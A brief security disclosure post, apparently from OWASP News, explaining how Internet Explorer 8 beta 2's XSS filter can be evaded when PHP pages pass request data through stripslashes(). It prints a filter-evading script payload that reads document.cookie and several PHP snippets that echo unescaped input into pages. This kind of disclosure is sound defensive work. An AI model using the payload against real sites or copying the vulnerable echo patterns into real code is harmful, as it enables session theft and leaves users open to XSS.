Bypassing MSIE8 XSS Filter By Design.

When MSIE8 beta 2 launched a few days ago, I took it for a little spin to see if it puts up what it says it does. I'm actually quite happy and surprised with the XSS filter, but one thing is quite concerning in my opinion. I talked with David Ross from Microsoft about it over the weekend and explained my thoughts on slashes being put in vectors to subvert the XSS filter.

Since the XSS filter is signature based, I came up with a simple idea to bypass it in certain situations. I know that many programmers use PHP's function stripslashes() as a kind of automatic reflex on data that comes either from a querystring or data that comes out a database. Since the XSS filter analyzes the query string, it is possible to bypass it if a programmer uses stripslashes or a custom written replace function on requested data. Moreover since many PHP installations still use magic_quotes_gpc() programmers will use stripslashes in order to remove the added slashes, so this scenario is not exotic.

This vector gets by unnoticed:

index.php?name="><sc\ript>alert(document.cookie);</script>

Situations where the stripslashes is regularly utilized:

Titles:

<h1><?= stripslashes($_REQUEST['name']);?></h1>

Search:

<h1>You searched for... <?= stripslashes($_REQUEST['name']); ?></h1>

Forms:

<input name="search" value="<?= stripslashes($_REQUEST['name']); ?>" />

etc.

In such cases, the XSS vector passes the XSS filter. Since the XSS filter prevents common programming mistake exploitation, it's likely that those same programmers utilize slash removal functions as a no-brainer as well. So far, this XSS filter is quite nice and it does it's job very good and clean. While it's a minor issue, I really want to see a protection for this issue since it's common occurrence and far from being trivial.
source: OWASP News